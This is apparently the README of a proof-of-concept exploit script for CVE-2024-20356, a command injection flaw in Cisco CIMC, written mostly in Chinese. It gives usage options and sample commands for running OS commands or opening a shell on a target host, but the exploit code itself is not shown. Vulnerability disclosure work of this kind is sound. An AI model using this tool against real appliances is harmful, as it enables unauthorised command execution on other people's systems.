
This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
这是 CVE-2024-20356 的概念验证,一个影响思科 CIMC 的命令注入漏洞。
完整技术细节请访问 https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom
用法: CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
选项:
-h, --help 显示此帮助信息并退出
-t HOST, --host HOST 目标主机名或IP地址(格式:10.0.0.1 或 10.0.0.2:1337)
-u USERNAME, --username USERNAME
用户名(默认:admin)
-p PASSWORD, --password PASSWORD
密码(默认:cisco)
-a ACTION, --action ACTION
操作:test, cmd, shell, dance(默认:test)
-c CMD, --cmd CMD 要运行的操作系统命令(默认:无)
-v, --verbose 显示有关 CIMC 的更多信息
示例命令:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
使用 --help 参数查看完整用法说明。
此概念验证仅供演示目的,不应用于非法活动。LRQA Nettitude 对因使用或滥用此代码造成的任何损害概不负责。